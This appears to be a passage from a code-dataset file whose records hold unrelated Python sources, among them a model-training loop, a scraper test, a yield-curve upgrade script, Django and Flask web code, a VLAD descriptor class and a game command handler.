args.robust:\n            eps = min(eps_inc_per_step * ((epoch - 1) * len(train_batches) + i + 1), 1.0)\n        else:\n            eps = 0.\n        acc, loss, acc_robust, loss_robust = \\\n            step(model, ptb, batch, eps=eps, train=True)\n        avg_acc.update(acc, len(batch))\n        avg_loss.update(loss, len(batch))\n        avg_acc_robust.update(acc_robust, len(batch))\n        avg_loss_robust.update(loss_robust, len(batch)) \n        if (i + 1) % args.gradient_accumulation_steps == 0 or (i + 1) == len(train_batches):\n            scale_gradients(optimizer, i % args.gradient_accumulation_steps + 1)\n            optimizer.step()\n            optimizer.zero_grad() \n        if (i + 1) % args.log_interval == 0:\n            logger.info(\"Epoch {}, training step {}/{}: acc {:.3f}, loss {:.3f}, acc_robust {:.3f}, loss_robust {:.3f}, eps {:.3f}\".format(\n                epoch, i + 1, len(train_batches),\n                avg_acc.avg, avg_loss.avg, avg_acc_robust.avg, avg_loss_robust.avg,\n                eps\n            ))\n    model.save(epoch)\n\ndef infer(epoch, batches, type):\n    avg_acc.reset()\n    avg_loss.reset()\n    avg_acc_robust.reset()\n    avg_loss_robust.reset() \n    for i, batch in enumerate(batches):\n        acc, loss, acc_robust, loss_robust = step(model, ptb, batch)\n        avg_acc.update(acc, len(batch))\n        avg_loss.update(loss, len(batch)) \n        avg_acc_robust.update(acc_robust, len(batch))\n        avg_loss_robust.update(loss_robust, len(batch)) \n        if (i + 1) % args.log_interval == 0:\n            logger.info(\"Epoch {}, {} step {}/{}: acc {:.3f}, loss {:.5f}, acc_robust {:.3f}, loss_robust {:.5f}\".format(\n                epoch, type, i + 1, len(batches),\n                avg_acc.avg, avg_loss.avg, avg_acc_robust.avg, avg_loss_robust.avg\n            )) \n    logger.info(\"Epoch {}, {}: acc {:.3f}, loss {:.5f}, acc_robust {:.3f}, loss_robust {:.5f}\".format(\n        epoch, type,\n        avg_acc.avg, avg_loss.avg, avg_acc_robust.avg, avg_loss_robust.avg\n    ))\n    if args.res_file is not None:\n        with open(args.res_file, \"wb\") as file:\n            pickle.dump((avg_acc, avg_loss, avg_acc_robust, avg_loss_robust), file)\n\ndef main():\n    if args.train:\n        for t in range(model.checkpoint, args.num_epochs):\n            train(t + 1)\n            infer(t + 1, dev_batches, \"dev\")\n            infer(t + 1, test_batches, \"test\")\n    elif args.oracle:\n        oracle(model, ptb, data_test, \"test\")\n    else:\n        infer(None, test_batches, \"test\")\n\nif __name__ == \"__main__\":\n    main()","sub_path":"examples/language/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":12547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"536569924","text":"import unittest\nimport requests\nfrom src.NprScraper import *\n\n\n\nclass MyTestCase(unittest.TestCase):\n    url = 'https://api.composer.nprstations.org/v1/widget/519298c7e1c876ffebb2149b/day?date=2020-02-01&format=html'\n\n    def test_get(self):\n        page = requests.get(self.url)\n        self.assertIsNotNone(page)\n\n    def test_parse(self):\n        page = requests.get(self.url)\n        pp = NprScraper()\n        pp.parse(page)\n        self.assertIsNotNone(pp)\n\n\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"jazz_scraper/test/jazz_test_0.py","file_name":"jazz_test_0.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"537759227","text":"# This python script template is provided by SunGard Front Arena in order to facilitate a scripted \n# upgrade of yield curves for PRIME 2011.2 (or later). Please refer to SPR 316459 for more \n# information on the changes in yield curve handling in PRIME 2011.2.\n#\n# Note that this script must be customized by each customer in order to select the correct set of\n# yield curves and then perform the preferred set of actions on these yield curves.\n# \n# The default layout of the script below will currently only do the following:\n#\n# 1. Select all yield curve objects (see \"Main Script\" at the end)\n#\n# 2. For each curve that meets the criteria in \"ValidCurve\" (currently the filters only remove all \n#    historical yield curves) the script will perform the following actions:\n#\n#    * If the curve has estimation_type Boot Strap Alt and Use Benchmark Dates is selected \n#\t=> Clear the Use Benchmark Dates setting\n#    * If the curve has benchmarks \n#\t=> Delete all existing yield curve points and generate new benchmark yield curve points \n#    * If the curve has yield curve points that have been updated\n#\t=> Calibrate the yield curve and commit new rate values to the ADM\n#\n# Note that it is strongly recommended to always run the script in test mode first and go through \n# the created log.\n#\n# Change log (any changes made (by Front Arena staff) to the file saved as attachment in FAST \n# should be stated here):\n#\n# 2011-05-18: Initial version saved in FAST (marlar01)\n#\n\nimport acm\n\n# ---------------------------------------------------------------------------------------------------------\n# ---------------------------------------------------------------------------------------------------------\n# ---------------------------------------------------------------------------------------------------------\n# User Inputs:\n\n# testMode is True if no changes are to be committed - only set to False if CERTAIN that your changes are intended.\ntestMode = False\n\n# Filtering. An empty list means \"everything\"\n\n# Only yield curve types that should be upgraded\n# e.g. inputYieldCurveTypes = [\"Benchmark\", \"Spread\"]\nfilterYieldCurveTypes = []\n\n# Only yield curves with the following bootstrap methods will be upgraded\n# e.g. filterDefinedBootstrapMethods = [\"Boot Strap\", \"Boot Strap Alt\"]\nfilterDefinedBootstrapMethods = []\n\n# Only yield curves with the following use benchmark settings will be upgraded\n# e.g. 
filterUseBenchmarkDatesSettings = [True], or filterUseBenchmarkDatesSettings = [False]\n# or filterUseBenchmarkDatesSettings = [True, False] but this is just the same as filterUseBenchmarkDatesSettings = []\nfilterUseBenchmarkDatesSettings = []\n\n# If you only want to upgrade curves with benchmark or without etc\n# e.g. filterCurveHasBenchmarks = [True] ... etc\nfilterCurveHasBenchmarks = []\n\n# True if you only want to upgrade real time updated curves, False if only non real time updated curves, otherwise empty\n# e.g. filterRealTimeUpdatedCurves = [True] ... etc\nfilterRealTimeUpdatedCurves = []\n\n# Only upgrade curves with the following Currencies, empty means all\n# e.g. filterCurrencyNames = [\"EUR\", \"CHF\", \"SEK\"]\nfilterCurrencyNames = []\n\n# Only upgrade following curves, empty means all\n# e.g. filterCurveNames = [\"EUR-SWAP\"]\nfilterCurveNames = []\n\n# Exclude the following curves from upgrade.\n# (Has higher priority than the positive filters above.)\nexcludeCurveNames = ['ZAR-PRIME'] # ZAR-PRIME agreed with business not to upgrade, according to Anil.\n\n# ---------------------------------------------------------------------------------------------------------\n# ---------------------------------------------------------------------------------------------------------\n# ---------------------------------------------------------------------------------------------------------\n\n# Constants and methods relating to what changes have happened to an upgraded curve -----------------------\nclass UpgradeChange:\n UntoggledUseBenchmarkDatesOnBootstrapAltCurve = 1\n BenchmarkPointsGeneratedAndCalculated = 2\n StorageCalcTypeUpdated = 3\n\nreason = \"Reason\"\naction = \"Action\"\n\ndef ChangeDescription( changeEnum ):\n changeDescription = {}\n changeDescription[reason] = \"\"\n changeDescription[action] = \"\"\n \n if UpgradeChange.UntoggledUseBenchmarkDatesOnBootstrapAltCurve == changeEnum:\n changeDescription[reason] = \"'Use Benchmark Dates' was toggled and Solver input was set to 'Boot Strap Alt'.\"\n changeDescription[action] = \"'Use Benchmark Dates' has been untoggled.\"\n elif UpgradeChange.BenchmarkPointsGeneratedAndCalculated == changeEnum:\n changeDescription[reason] = \"The yield curve contains benchmarks.\"\n changeDescription[action] = \"The yield curve points have been cleared and benchmark points have been generated.\"\n elif UpgradeChange.StorageCalcTypeUpdated == changeEnum:\n changeDescription[reason] = \"The yield curve is of type Spread and has an incompatible pair of IpolRateType and StorageCalcType.\"\n changeDescription[action] = \"StorageCalcType has been set to Spot Rate\"\n else:\n changeDescription[reason] = \"Unknown reason.\"\n changeDescription[action] = \"Unknown action.\"\n \n \n return changeDescription\n# ---------------------------------------------------------------------------------------------------------\n\n\n# Helper functions ----------------------------------------------------------------------------------------\n\n# This method, for the given curve, is intended to determine whether it is acceptable\n# for new benchmark instrument points to be generated or not\ndef CurveIsBenchmarkPointCandidate( yieldCurve ):\n benchmarkSize = yieldCurve.Benchmarks().Size()\n if benchmarkSize > 0:\n return True\n return False\n# ---------------------------------------------------------------------------------------------------------\n \n\n# Changes -------------------------------------------------------------------------------------------------\n# 
For each change that can be made, there should exist:\n# 1. A Method that takes as parameters: the yield curve, a dictionary that will contain boolean values\n# indicating whether a change was made, and a dictionary containing boolean values indicating\n# whether the change was successful if it was attempted. This method should perform the change on\n# the yield curve, and it should fill the dictionaries, at a key defined in class UpdateChanges, with\n# boolean values flagging if a change was made and whether it was successful, as described above.\n# 2. As implied above, there should be a unique integer member of class UpgradeChanges, that will be\n# used as a key as explained in part 1 above.\n# 3. For each integer member of UpgradeChanges, the method ChangeDescription should return a dictionary\n# that, for the integer, gives a \"Reason\" and an \"Action\" \n\n# Change 1:\ndef UntoggledUseBenchmarkDatesOnBootstrapAltCurveIfNeeded( yieldCurve, changesDictionary, failuresDictionary ):\n failure = False\n changed = False\n \n if (yieldCurve.EstimationType() == \"Boot Strap Alt\") and (yieldCurve.UseBenchmarkDates()) :\n yieldCurve.UseBenchmarkDates( False )\n changed = True\n\n failuresDictionary[UpgradeChange.UntoggledUseBenchmarkDatesOnBootstrapAltCurve] = failure\n changesDictionary[UpgradeChange.UntoggledUseBenchmarkDatesOnBootstrapAltCurve] = changed\n \n \n# Change 2: This method tries to generate new benchmark instrument points, then calculate the curve\ndef GenerateBenchmarkPointsAndCalculate( yieldCurve, changesDictionary, failuresDictionary ):\n failure = False\n changed = False\n \n if CurveIsBenchmarkPointCandidate( yieldCurve ):\n try:\n yieldCurve.GenerateAndLinkPointsFromBenchmarks()\n changed = True\n except:\n failure = True\n\n try:\n yieldCurve.Calculate()\n changed = True\n except:\n failure = True\n \n failuresDictionary[UpgradeChange.BenchmarkPointsGeneratedAndCalculated] = failure\n changesDictionary[UpgradeChange.BenchmarkPointsGeneratedAndCalculated] = changed\n\n\n# Change 3: Prevent the \"invalid properties set\" dialog. (Hynek)\ndef UpdateStorageCalcType(yieldcurve, changesDictionary, failuresDictionary):\n failure = changed = False\n try:\n if (yieldcurve.Type() == 'Spread' and yieldcurve.StorageCalcType() == 'Par FRN Rate' and\n yieldcurve.IpolRateType() == 'Spot Rate'):\n yieldcurve.StorageCalcType('Spot Rate')\n changed = True\n except Exception:\n failure = True\n failuresDictionary[UpgradeChange.StorageCalcTypeUpdated] = failure\n changesDictionary[UpgradeChange.StorageCalcTypeUpdated] = changed\n\n# ---------------------------------------------------------------------------------------------------------\n \n \n# This method \"upgrades\" any curve. 
As a template, the suggestion is that any curve with\n# estimation type \"Boot Strap Alt\" should have \"Use Benchmark Dates\" untoggled, and secondly,\n# if a curve contains benchmarks, then all points should be cleared, and new points\n# containing these benchmarks should be generated - this is done with the method\n# GenerateBenchmarkPointsAndCalculate().\ndef UpgradeCurve( yieldCurve, changesDictionary, failuresDictionary ):\n # First suggested upgrade action\n UntoggledUseBenchmarkDatesOnBootstrapAltCurveIfNeeded( yieldCurve, changesDictionary, failuresDictionary ) \n \n # Second suggested upgrade action\n GenerateBenchmarkPointsAndCalculate( yieldCurve, changesDictionary, failuresDictionary )\n\n # Custom added upgrade action\n UpdateStorageCalcType(yieldCurve, changesDictionary, failuresDictionary)\n \n\n# Commit the curve only if not in test mode\ndef CommitCurve( yieldCurve, clone ):\n if not testMode:\n try:\n yieldCurve.Apply( clone )\n yieldCurve.Commit()\n except:\n print(\" \"*4 + \"Commit failed - please update curve '\" + yieldCurve.Name() + \"' manually.\")\n\n\n# Logging -------------------------------------------------------------------------------------------------\ndef LogIndividualChanges( yieldCurve, changeDictionary ):\n print(\"\")\n print(\" \"*4 + \"Change details for yield curve '\" + yieldCurve.Name() + \"':\")\n i = 0\n for change in changeDictionary:\n if changeDictionary[change]:\n i = i + 1\n changeDetails = ChangeDescription(change)\n print(\"\")\n print(\" \"*4 + \"Change \" + str(i) + \":\")\n print(\" \"*4 + \"Reason: \" + changeDetails[reason])\n print(\" \"*4 + \"Action: \" + changeDetails[action])\n\ndef LogChanges( yieldCurve, changeDictionary, failureDictionary ):\n changed = False\n failed = False\n\n for change in changeDictionary:\n changed = (changed or changeDictionary[change])\n\n for failure in failureDictionary:\n failed = (failed or failureDictionary[failure])\n \n openingMessage = \"Yield Curve '\" + yieldCurve.Name() + \"'\"\n logIndividualChanges = False\n \n print(\"\")\n print(\"-\"*120)\n \n if failed:\n openingMessage = openingMessage + \" requires upgrade but was not successful. 
Please open the Yield Curve Definition and upgrade manually.\"\n else:\n if changed:\n openingMessage = openingMessage + \" met the user specified criteria for upgrade, changes were applicable and were made successfully.\"\n logIndividualChanges = True\n else:\n openingMessage = openingMessage + \" met the user specified criteria for upgrade, but no changes were applicable.\"\n \n print(openingMessage)\n \n if logIndividualChanges:\n LogIndividualChanges( yieldCurve, changeDictionary )\n# ---------------------------------------------------------------------------------------------------------\n\n\n# Methods for filtering yield curves to those that the user wants to change -------------------------------\ndef ValidEntry( list, entry ):\n if 0 == len(list):\n return True\n elif entry in list:\n return True\n return False\n\ndef YieldCurveTypeValidity( yieldCurveType ):\n return ValidEntry( filterYieldCurveTypes, yieldCurveType )\n\ndef DefinedBootstrapMethodValidity( definedBootstrapMethod ):\n return ValidEntry( filterDefinedBootstrapMethods, definedBootstrapMethod )\n\ndef UseBenchmarkDatesSettingValidity( useBenchmarkDatesSetting ):\n return ValidEntry( filterUseBenchmarkDatesSettings, useBenchmarkDatesSetting )\n\ndef CurveHasBenchmarkValidity( curveHasBenchmark ):\n return ValidEntry( filterCurveHasBenchmarks, curveHasBenchmark )\n\ndef RealTimeUpdatedCurveValidity( realTimeUpdatedCurve ):\n return ValidEntry( filterRealTimeUpdatedCurves, realTimeUpdatedCurve )\n\ndef CurrencyNameValidity( currencyName ):\n return ValidEntry( filterCurrencyNames, currencyName )\n\ndef CurveNameValidity( curveName ):\n return ValidEntry( filterCurveNames, curveName ) and curveName not in excludeCurveNames\n\n\n# This method determines if, given the user input criteria, whether a given yield curve\n# is a candidate for upgrade\ndef ValidCurve( yieldCurve ):\n if yieldCurve.IsHistorical():\n return False\n if not YieldCurveTypeValidity( yieldCurve.Type() ):\n return False\n if not DefinedBootstrapMethodValidity( yieldCurve.EstimationType() ):\n return False\n if not UseBenchmarkDatesSettingValidity( yieldCurve.UseBenchmarkDates() ):\n return False\n if not CurveHasBenchmarkValidity( yieldCurve.Benchmarks().Size() > 0 ):\n return False\n if not RealTimeUpdatedCurveValidity( yieldCurve.RealTimeUpdated() ):\n return False\n if not CurrencyNameValidity( yieldCurve.Currency().Name() ):\n return False\n if not CurveNameValidity( yieldCurve.Name() ):\n return False\n return True\n# ---------------------------------------------------------------------------------------------------------\n\n\n# ---------------------------------------------------------------------------------------------------------\n# --------------------------------------------- Main Script -----------------------------------------------\n# ---------------------------------------------------------------------------------------------------------\n\n\n\n\n\n\nael_variables = [\n ['firstRunTypes', 'Yield Curve Types for the first run', 'string', None, '', 1, 1, 'Yield Curve types to be upgraded first', None, 1],\n ['secondRunTypes', 'Yield Curve Types for the second run', 'string', None, '', 1, 1, 'Yield Curve types to be upgraded second', None, 1],\n]\ndef ael_main(parameters):\n # Get hold of all yield curves in the database. 
Note that the Select statement below can be altered\n    # in order to select a smaller set of yield curves, for example by using: \n    # yieldCurves = acm.FYieldCurve.Select(\"name like 'EUR-SWAP*'\")\n    \n    yieldCurves = acm.FYieldCurve.Select(\"\")\n\n    if testMode:\n        print(\"Running in test mode - changes will not be saved\")\n\n    print(\"Total Curves in selection: \" + str(len(yieldCurves)))\n\n    # Iterate through all curves and for each curve, if the curve meets the criteria specified\n    # by method ValidCurve(), then upgrade the curve. Note that by \"upgrade the curve\" is meant\n    # \"perform on the curve what is specified in the method UpgradeCurve()\"\n\n    for yc_types in (parameters['firstRunTypes'], parameters['secondRunTypes']): # First benchmark curves are upgraded, then the rest.\n        filterYieldCurveTypes[:] = list(yc_types) # Set the yield curve type filter.\n        print(filterYieldCurveTypes)\n        for yieldCurve in yieldCurves:\n            if ValidCurve( yieldCurve ):\n                changes = {}\n                failures = {}\n                clone = yieldCurve.Clone()\n                UpgradeCurve( clone, changes, failures )\n                CommitCurve( yieldCurve, clone )\n                LogChanges( yieldCurve, changes, failures )\n\n# ---------------------------------------------------------------------------------------------------------\n# ---------------------------------------------------------------------------------------------------------\n# ---------------------------------------------------------------------------------------------------------\n\n","sub_path":"Python modules/Upgrade_Yieldcurves.py","file_name":"Upgrade_Yieldcurves.py","file_ext":"py","file_size_in_byte":16298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"311981487","text":"import random\nimport csv\nimport os\nfrom dotenv import load_dotenv\n\nfrom const import *\n\nTARGET_WORD_COLUMN_IDX = 0\nSIMILAR_WORD_COLUMN_IDX = 1\nSIMILARITY_COLUMN_IDX = 2\n\ndef append_target_word(target_word, similar_word_list):\n    TARGET_WORD_RATE = os.environ.get('TARGET_WORD_RATE')\n    if float(TARGET_WORD_RATE) > 0:\n        correct_word_num = int(len(similar_word_list) * float(TARGET_WORD_RATE))\n        similar_word_list += [[target_word, target_word, 1.0] for x in range(correct_word_num)]\n    return similar_word_list\n\ndef create_similar_word_list_all():\n    similar_word_list_all = []\n    similar_word_list = []\n    prev_target_word = ''\n\n    dotenv_path = os.path.join(os.path.dirname(__file__), '.env')\n    load_dotenv(dotenv_path)\n\n    with open(WORD_SOURCE_FILE_NAME, 'r') as f:\n        reader = csv.reader(f)\n        next(reader) # skip the header row\n\n        for row in reader:\n            current_target_word = row[TARGET_WORD_COLUMN_IDX]\n            \n            if prev_target_word != '' and prev_target_word != current_target_word:\n                \n                # answers that differ too much from the correct word are boring, so mix in a fixed share of the correct word as well\n                similar_word_list = append_target_word(prev_target_word, similar_word_list)\n                similar_word_list_all.append(similar_word_list)\n                similar_word_list = []\n\n            # strip '[' and ']'\n            similar_word = row[SIMILAR_WORD_COLUMN_IDX].replace('[', '').replace(']', '')\n            # some entries look like [米], so skip if stripping makes the word identical to the target\n            if similar_word == current_target_word:\n                continue\n\n            # use the value with '[' and ']' stripped\n            row[SIMILAR_WORD_COLUMN_IDX] = similar_word\n\n            similar_word_list.append(row)\n            prev_target_word = current_target_word\n        \n        # for the final word list\n        similar_word_list = append_target_word(prev_target_word, similar_word_list)\n        similar_word_list_all.append(similar_word_list)\n    return similar_word_list_all\n\ndef append_random_select_word(word_list, selected_words):\n    selected_words.append(random.choice(word_list))\n    return selected_words\n\n# the app uses this one\ndef select_random_words(similar_word_list_all):\n    selected_words = []\n    for similar_word_list in similar_word_list_all:\n        append_random_select_word(similar_word_list, selected_words)\n    return selected_words\n\n# for trying things out\ndef select_words_by_rank(similar_word_list_all, rank):\n    selected_words = []\n    for similar_word_list in similar_word_list_all:\n        selected_words.append(similar_word_list[rank-1])\n    return selected_words\n\ndef join_words(selected_words):\n    words = map(lambda word: word[SIMILAR_WORD_COLUMN_IDX], selected_words)\n    return ''.join(words)\n\ndef calc_avg_similarity(selected_words):\n    similarities = map(lambda word: float(word[SIMILARITY_COLUMN_IDX]), selected_words)\n    return sum(similarities) / len(selected_words)\n\ndef format_similarity(similarity):\n    return '{:.2%}'.format(float(similarity))\n\ndef format_word_similarity(selected_words):\n    result = ''\n    for word in selected_words:\n        target_word = word[TARGET_WORD_COLUMN_IDX]\n        similar_word = word[SIMILAR_WORD_COLUMN_IDX]\n        formatted_words = f'[{target_word}-{similar_word}]'.ljust(7, ' ')\n        \n        formatted_similarity = format_similarity(word[SIMILARITY_COLUMN_IDX])\n        result += f'\\n{formatted_words} similarity: {formatted_similarity}'\n    return result\n\ndef format_all_result(selected_words):\n    name = join_words(selected_words)\n    name_similarity = format_similarity(calc_avg_similarity(selected_words))\n    # print(name_similarity, name)\n\n    format_name_similarity = f'average similarity: {name_similarity}'\n    similarity_detail = format_word_similarity(selected_words)\n    return f'{name}\\n{similarity_detail}\\n{format_name_similarity}'\n\ndef generate_formatted_random_name():\n    similar_word_list_all = create_similar_word_list_all()\n    selected_words = select_random_words(similar_word_list_all)\n    return format_all_result(selected_words)\n\nif __name__ == \"__main__\":\n    for i in range(1):\n        text = generate_formatted_random_name()\n        print(text)","sub_path":"similar_name_generator.py","file_name":"similar_name_generator.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"360495145","text":"import cv2\nfrom scipy.cluster.vq import vq\nfrom sklearn.cluster import MiniBatchKMeans\nfrom sklearn.preprocessing import StandardScaler\nimport numpy as np\nimport os\nfrom sklearn.externals import joblib\n\nclass Vlad(object):\n\n\tdef __init__(self, num_clusters = 8):\n\t\tself.num_clusters = num_clusters\n\t\tself.flag = False\n\t\tself.this_dir = os.path.abspath(os.path.dirname(__file__))\n\n\tdef load(self, vlad_file='../models/vlad.pkl'):\n\t\tvlad_file = os.path.join(self.this_dir, vlad_file)\n\t\tself.stdSlr, self.centers = joblib.load(vlad_file)\n\t\tself.flag = True\n\n\tdef save(self, vlad_file='../models/vlad.pkl'):\n\t\tvlad_file = os.path.join(self.this_dir, vlad_file)\n\t\tjoblib.dump((self.stdSlr, self.centers), vlad_file, compress=3)\n\n\tdef cal_vlad(self, descriptors, centers):\n\t\tif self.flag is False:\n\t\t\tself.load()\n\t\tif self.stdSlr is not None:\n\t\t\tdescriptors = self.stdSlr.transform(descriptors)\n\t\tdimensions = descriptors[0].shape[0]\n\t\tvlad_vector = np.zeros((len(centers),dimensions), dtype=np.float32)\n\t\tcenter_idx, distance = vq(descriptors, centers)\n\t\tfor i,idx in enumerate(center_idx):\n\t\t\tvlad_vector[idx] += (descriptors[i] - centers[idx])\n\t\tvlad_vector = cv2.normalize(vlad_vector)\n\t\tvlad_vector = vlad_vector.flatten()\n\t\treturn vlad_vector\n\n\tdef fit(self, descs, 
preprocess=True):\n\t\tif preprocess:\n\t\t\tself.stdSlr = StandardScaler()\n\t\t\tself.stdSlr.fit(descs)\n\t\t\ttmp = self.stdSlr.transform(descs)\n\t\telse:\n\t\t\ttmp = descs\n\t\t\tself.stdSlr = None\n\t\tkmeans = MiniBatchKMeans(init='k-means++', n_clusters=self.num_clusters, batch_size=10000)\n\t\tkmeans.fit(tmp)\n\t\tself.centers = kmeans.cluster_centers_\n\t\tself.clusters = kmeans.labels_\n\t\treturn self.centers\n\n\tdef transform(self, descriptor):\n\t\treturn self.norm(self.cal_vlad(descriptor, self.centers))\n\n\tdef norm(self, fv):\n\t\tdatasets = np.sqrt(np.abs(fv)) * np.sign(fv)\n\t\tnorms = np.sqrt((datasets ** 2).sum())\n\t\treturn datasets/norms","sub_path":"python/CBIR/my_package/vlad.py","file_name":"vlad.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"501306175","text":"#!/usr/local/bin/python3\n\"\"\"Produce a listing of people's names, ages and weights.\"\"\"\n\ndata = [\n (\"Steve\", 59, 202),\n (\"Dorothy\", 49, 99),\n (\"Simon\", 39, 155),\n (\"David\", 61, 135) ]\n\n#for row in data:\n# print(\"{0[0]:<12s} {0[1]:4d} {0[2]:4d}\".format(row))\n\nfor name, age, weight in data:\n print(\"{0:.<12s}{1:.>4d}{2:.>10d}\".format(name, age, weight))\n\n","sub_path":"personlist.py","file_name":"personlist.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"346826149","text":"from django.http import HttpResponse\nfrom .models import Ranking\nimport json\n\ndef get_all_data(request):\n # a function to retrieve all data from database\n if request.method == 'GET':\n data = {\"data\": []}\n qs = Ranking.objects.all()\n for one_rank in qs:\n data['data'].append({\n \"id\": one_rank.id,\n \"year\": one_rank.yearRange,\n \"location\": one_rank.location,\n \"type\": one_rank.type,\n \"total_number\": one_rank.total_number\n })\n return HttpResponse(status=200, content=json.dumps(data), content_type='application/json')\n else:\n return HttpResponse(status=405)\n\ndef getDistinctValue(request):\n # a function to retrieve the data that can be dumped into the filters\n if request.method=='GET':\n data = {\"yearRange\": [], 'location':[],'type':[]}\n yearRange = Ranking.objects.distinct().order_by().values('yearRange')\n location = Ranking.objects.distinct().order_by().values('location')\n type = Ranking.objects.distinct().order_by().values('type')\n for i in yearRange:\n data['yearRange'].append(i['yearRange'])\n for j in location:\n data['location'].append(j['location'])\n for j in type:\n data['type'].append(j['type'])\n return HttpResponse(status=200, content=json.dumps(data), content_type='application/json')\n else:\n return HttpResponse(status=405)\n\n\ndef getVaccinationForTwoLocation(request):\n # a function to retrieve the vaccination information based on the location and year filters.\n import json\n if request.method=='POST':\n data = {'location1':[],'location2':[]}\n body = json.loads(request.body)\n qs = Ranking.objects.filter(location = body.get('location1'), yearRange=body.get(\"year\"))\n qs2 =Ranking.objects.filter(location = body.get('location2'), yearRange=body.get(\"year\"))\n\n for one_rank in qs:\n data['location1'].append({\n \"type\": one_rank.type,\n \"total_number\": one_rank.total_number\n })\n for one_rank in qs2:\n data['location2'].append({\n \"type\": one_rank.type,\n \"total_number\": one_rank.total_number\n })\n\n return HttpResponse(status=200, 
content=json.dumps(data), content_type='application/json')\n    else:\n        return HttpResponse(status=405)\n","sub_path":"mysite/polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"37523367","text":"from flask import Flask, render_template, url_for\nfrom flask.ext.assets import Environment, Bundle\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom celery import Celery\n\ndef make_celery(app):\n    celery = Celery(app.import_name, broker=app.config['CELERY_BROKER_URL'])\n    celery.conf.update(app.config)\n    TaskBase = celery.Task\n    class ContextTask(TaskBase):\n        abstract = True\n        def __call__(self, *args, **kwargs):\n            with app.app_context():\n                return TaskBase.__call__(self, *args, **kwargs)\n    celery.Task = ContextTask\n    return celery\n\n# create app object and configure\napp = Flask(__name__)\napp.config.from_object('config')\n\n# create celery object\ncelery = make_celery(app)\n\n# initialize flask-assets\nassets = Environment()\nassets.init_app(app)\n# register system wide CSS assets as 'main_css'\nassets.register('main_css',\n        'css/bootstrap.min.css',\n        'css/responsive.min.css',\n        'css/style.css',\n        'font/elusive-icons/css/elusive-webfont.min.css',\n        output='cached.css', filters='cssmin')\n\nassets.register('main_js',\n        'js/bootstrap.js',\n        'js/application.js',\n        output='cached.js', filters='jsmin')\n\n# initialize flask-sqlalchemy\ndb = SQLAlchemy(app)\n\nclass Base(db.Model):\n    __abstract__ = True\n    id = db.Column(db.Integer, primary_key=True)\n    created_at = db.Column(db.DateTime, default=db.func.current_timestamp())\n    updated_at = db.Column(db.DateTime, default=db.func.current_timestamp(),\n                           onupdate=db.func.current_timestamp())\n\n# define global error handlers\n@app.errorhandler(404)\ndef not_found(error):\n    return render_template('404.html'), 404\n\n# load flask-blueprint apps\nfrom app.mod_home.views import mod_home\nfrom app.mod_orders.views import mod_orders\n\napp.register_blueprint(mod_home)\napp.register_blueprint(mod_orders)\n\n# create db while debugging\nif app.config['DEBUG']:\n    db.create_all()\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"353469851","text":"\nfrom __future__ import annotations\n\nfrom typing import List\nfrom typing import Type\n\nfrom component.role import Role\nfrom component.room import Room\n\nfrom event.event import Event\nfrom message.message import Message\nfrom system.channel import Channel\n\nfrom logcat.logcat import LogCat\n\nclass CmdLook:\n    @LogCat.log_func\n    def __init__(self, servant: Type[Handler]):\n        servant.on(Event.CMD_LOOK, self._on_cmd_look)\n        servant.on(Event.CMD_ABBR_LOOK, self._on_cmd_look)\n\n    @LogCat.log_func\n    def _on_cmd_look(\n        self, e: Event, entity: str = '', args: List[str] = []\n    ) -> None:\n        role = Role.instance(entity)\n\n        if not args:\n            room = Room.instance(role.room)\n\n            text = f'{room.name} -'\n            Channel.toRole(entity, Message.TEXT, text)\n\n            for text in room.description:\n                Channel.toRole(entity, Message.TEXT, text)\n\n            if not room.exits:\n                text = 'There are no exits here'\n            else:\n                text = room.exits\n        else:\n            text = f'What are you looking at?'\n\n        Channel.toRole(entity, Message.TEXT, text)\n\n# cmd_look.py\n","sub_path":"muted/system/cmd_look.py","file_name":"cmd_look.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"427397204","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\n\nfrom sklearn import preprocessing\n\nfrom data.data_loader import data_loader, DataLoader, Utterance\nfrom classify import configuration\nfrom classify.feature_extractor import Feature_Extractor\nfrom classify.exp_shallowmodel import ShallowExperimenter\nimport numpy as np\nimport os\n\n__author__ = \"Rui Meng\"\n__email__ = \"rui.meng@pitt.edu\"\n\nif __name__ == '__main__':\n    # initialize\n    config = configuration.load_config()\n    extractor = Feature_Extractor(config)\n    exp = ShallowExperimenter(config)\n\n    best_results = {}\n    # iterate each dataset\n    for data_name in config['data_names']:\n        config.param['data_name'] = data_name\n\n        config.logger.info('*' * 50)\n        config.logger.info('-' * 20 + data_name + '-' * 20)\n        config.logger.info('*' * 50)\n        # initialize data_loader\n        loader = data_loader(data_name, {'config': config})\n        config['data_loader'] = loader\n        loader()\n        # load annotated data\n        session_ids, annotated_sessions = loader.load_annotated_data()\n        loader.stats()\n\n        # train and test\n        X_raw, Y, _ = extractor.split_to_instances(annotated_sessions)\n        X = extractor.extract()\n\n        \"\"\"\n        '''\n        the 1st version is scaled to zero-mean and uni-variance\n        now it's scaled with MinMaxScaler to make feature values non-negative\n        '''\n        # print(\"Checking for NaN and Inf\")\n        # print(\"np.inf=\", np.where(X<0))\n        # print(\"np.inf=\", np.where(np.isnan(X)))\n        # print(\"is.inf=\", np.where(np.isinf(X)))\n        # 